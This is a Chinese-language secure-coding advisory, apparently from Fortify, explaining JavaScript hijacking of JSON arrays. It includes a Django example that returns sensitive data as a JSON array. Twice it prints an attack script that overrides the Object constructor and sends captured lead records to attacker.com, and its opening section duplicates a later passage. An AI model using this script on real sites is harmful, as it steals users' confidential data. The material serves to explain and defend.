[{"fname":"Brian", "lname":"Chess", "phone":"6502135600",
  "purchases":60000.00, "email":"brian@example.com" },
 {"fname":"Katrina", "lname":"O'Neil", "phone":"6502135600",
  "purchases":120000.00, "email":"katrina@example.com" },
 {"fname":"Jacob", "lname":"West", "phone":"6502135600",
  "purchases":45000.00, "email":"jacob@example.com" }]

这种情况下，JSON 中包含了与当前用户相关的机密信息（一组潜在商机数据）。其他用户如果不知道该用户的会话标识符，便无法访问这些信息。（在大多数现代 Web 应用程序中，会话标识符存储在 cookie 中。）然而，如果受害者访问某个恶意网站，恶意网站就可以使用 JavaScript 劫持提取信息。如果受害者受到欺骗后，访问包含以下恶意代码的网页，受害者的重要信息就会被发送到攻击者的网站中。

<script>
// override the constructor used to create all objects so
// that whenever the "email" field is set, the method
// captureObject() will run. Since "email" is the final field,
// this will allow us to steal the whole object.
function Object() {
 this.email setter = captureObject;
}

// Send the captured object back to the attacker's Web site
function captureObject(x) {
  var objString = "";
  for (fld in this) {
    objString += fld + ": " + this[fld] + ", ";
  }
  objString += "email: " + x;
  var req = new XMLHttpRequest();
  req.open("GET", "http://attacker.com?obj=" +
           escape(objString),true);
  req.send(null);
}
</script>

<!-- Use a script tag to bring in victim's data -->
<script src="http://www.example.com/object.json"></script>

恶意代码使用脚本标签以在当前页面包含 JSON 对象。Web 浏览器将使用该请求发送相应的会话 cookie。换言之，处理此请求时将认为其源自合法应用程序。

当 JSON 阵列到达客户端时，将在恶意页面的上下文中对其进行评估。为了看清 JSON 的评估，恶意页面重新定义了用于创建新对象的 JavaScript 功能。通过此方法，恶意代码已插入一个钩子，该钩子允许其访问每个对象的创建并将对象的内容传递回恶意网站。与之相反，其他攻击可能会覆盖阵列默认的构造函数。为在混合应用中使用而建的应用程序有时会在每一 JavaScript 消息的末端调用回调功能。回调功能意味着将由混合应用中的其他应用程序定义。回调功能使 JavaScript 挟持攻击变得容易 -- 攻击者要做的就是定义该功能。应用程序可以是混合应用 - 友好型或安全型，但不可能两者兼备。如果用户未登录到易受攻击的网站，攻击者可以要求用户登录，然后显示该应用程序的合法登录页面。

这不是钓鱼攻击 -- 攻击者未获得用户凭证的访问权限 -- 因此反钓鱼对策将无法打败攻击。更复杂的攻击可能会通过使用 JavaScript 动态生成脚本标签，向应用程序作出一系列请求。此相同技术有时会用于创建应用程序混合应用。唯一的不同是，在此混合应用情况中，涉及的应用程序之一是恶意的。

如果发生以下情况，应用程序可能会很容易受到 JavaScript 劫持的攻击：
1) 使用 JavaScript 对象作为数据传输格式
2) 处理机密数据。由于 JavaScript 劫持漏洞不会作为编码错误的直接结果出现，所以 Fortify 安全编码规则包会通过识别在 HTTP 响应中产生的 JavaScript 代码，引起人们对潜在的 JavaScript 劫持漏洞的注意。

Web 浏览器执行同源策略 (Same Origin Policy)，以保护用户免受恶意网站的攻击。同源策略 (Same Origin Policy) 规定：如果要使用 JavaScript 来访问某个网页的内容的话，则 JavaScript 和网页必须都来源于相同的域。若不采取同源策略 (Same Origin Policy)，恶意网站便可以使用客户端凭证来运行从其他网站加载敏感信息的 JavaScript，并对这些信息进行提炼，然后将其返回给攻击者。通过 JavaScript 劫持，攻击者可以绕过 Web 应用程序中使用的同源策略 (Same Origin Policy)，该应用程序使用 JavaScript 来交流机密信息。同源策略 (Same Origin Policy) 中的漏洞是：通过这一策略，任何网站的 JavaScript 都可以被其他网站的上下文包含或执行。即使恶意网站不能直接在客户端上检查易受攻击的站点中加载的所有数据，但它仍可以通过配置一个特定的环境利用该漏洞。有了这样的环境，恶意网站就可以监视 JavaScript 的执行过程和任何可能发生的相关负面效应。由于许多 Web 2.0 应用程序使用 JavaScript 作为数据传输机制，因此，与传统的 Web 应用程序不同，它们往往很容易受到各种攻击。

JavaScript 中最常见的信息传输格式为 JavaScript Object Notation (JSON)。JSON RFC 将 JSON 语法定义为 JavaScript 类实例文本化定义语法 (object literal syntax)的子集。JSON 基于两种数据结构类型：阵列和对象。所有可以作为一个或多个有效 JavaScript 语句进行解析的数据传送格式都容易受到 JavaScript 劫持的攻击。JSON 使 JavaScript 劫持变得更加容易，因为 JSON 数组坚持认为它自己就是有效的 JavaScript 指令。因为数组是交换列表的一种正常形式，在应用程序需要交换多个值时会普遍使用该形式。换句话说，一个 JSON 数组会直接受到 JavaScript 劫持的攻击。一个 JSON 对象只在其被一些其他 JavaScript 结构包围时才会受到攻击，这些 JavaScript 结构坚持认为它们自己就是有效的 JavaScript 指令。

示例 1：在以下示例中，开头显示了一个在 Web 应用程序的客户端和服务器组件之间进行的合法 JSON 交互，这一 Web 应用程序用于管理潜在商机。接下来，它说明了攻击者如何模仿客户端获取服务器端返回的机密信息。注意，本例子是专为基于 Mozilla 的浏览器而编写的代码。若在创建对象时，没有使用 new 运算符，则其他主流浏览器会禁止重载默认构造函数。

客户端向服务器请求数据，并通过以下代码评估 JSON 结果：

var object;
var req = new XMLHttpRequest();
req.open("GET", "/object.json",true);
req.onreadystatechange = function () {
  if (req.readyState == 4) {
    var txt = req.responseText;
    object = eval("(" + txt + ")");
    req = null;
  }
};
req.send(null);

当此代码运行时，它会生成一个如下所示的 HTTP 请求：

GET /object.json HTTP/1.1
...
Host: www.example.com
Cookie: JSESSIONID=F2rN6HopNzsfXFjHX1c5Ozxi0J5SQZTr4a5YJaSbAiTnRR

（在本 HTTP 响应和随后的响应中，我们省略了与该解释没有直接关系的 HTTP 头信息。）
服务器使用 JSON 格式的数组进行响应：

HTTP/1.1 200 OK
Cache-control: private
Content-Type: text/JavaScript; charset=utf-8
...
[{"fname":"Brian", "lname":"Chess", "phone":"6502135600",
  "purchases":60000.00, "email":"brian@example.com" },
 {"fname":"Katrina", "lname":"O'Neil", "phone":"6502135600",
  "purchases":120000.00, "email":"katrina@example.com" },
 {"fname":"Jacob", "lname":"West", "phone":"6502135600",
  "purchases":45000.00, "email":"jacob@example.com" }]

这种情况下，JSON 中包含了与当前用户相关的机密信息（一组潜在商机数据）。其他用户如果不知道该用户的会话标识符，便无法访问这些信息。（在大多数现代 Web 应用程序中，会话标识符存储在 cookie 中。）然而，如果受害者访问某个恶意网站，恶意网站就可以使用 JavaScript 劫持提取信息。如果受害者受到欺骗后，访问包含以下恶意代码的网页，受害者的重要信息就会被发送到攻击者的网站中。

<script>
// override the constructor used to create all objects so
// that whenever the "email" field is set, the method
// captureObject() will run. Since "email" is the final field,
// this will allow us to steal the whole object.
function Object() {
 this.email setter = captureObject;
}

// Send the captured object back to the attacker's web site
function captureObject(x) {
  var objString = "";
  for (fld in this) {
    objString += fld + ": " + this[fld] + ", ";
  }
  objString += "email: " + x;
  var req = new XMLHttpRequest();
  req.open("GET", "http://attacker.com?obj=" +
           escape(objString),true);
  req.send(null);
}
</script>

<!-- Use a script tag to bring in victim's data -->
<script src="http://www.example.com/object.json"></script>

恶意代码使用脚本标签以在当前页面包含 JSON 对象。Web 浏览器将使用该请求发送相应的会话 cookie。换言之，处理此请求时将认为其源自合法应用程序。

当 JSON 阵列到达客户端时，将在恶意页面的上下文中对其进行评估。为了看清 JSON 的评估，恶意页面重新定义了用于创建新对象的 JavaScript 功能。通过此方法，恶意代码已插入一个钩子，该钩子允许其访问每个对象的创建并将对象的内容传递回恶意网站。与之相反，其他攻击可能会覆盖阵列默认的构造函数。为在混合应用中使用而建的应用程序有时会在每一 JavaScript 消息的末端调用回调功能。回调功能意味着将由混合应用中的其他应用程序定义。回调功能使 JavaScript 挟持攻击变得容易 -- 攻击者要做的就是定义该功能。应用程序可以是混合应用 - 友好型或安全型，但不可能两者兼备。如果用户未登录到易受攻击的网站，攻击者可以要求用户登录，然后显示该应用程序的合法登录页面。

这不是钓鱼攻击 -- 攻击者未获得用户凭证的访问权限 -- 因此反钓鱼对策将无法打败攻击。更复杂的攻击可能会通过使用 JavaScript 动态生成脚本标签，向应用程序作出一系列请求。此相同技术有时会用于创建应用程序混合应用。唯一的不同是，在此混合应用情况中，涉及的应用程序之一是恶意的。

示例 2：以下代码显示 Django 样本查看方法，这种方法以 JSON 数组的形式发送包含敏感数据的 JSON 响应。

from django.http.response import JsonResponse
...
def handle_upload(request):
  response = JsonResponse(sensitive_data, safe=False)  # Sensitive data is stored in a list
  return response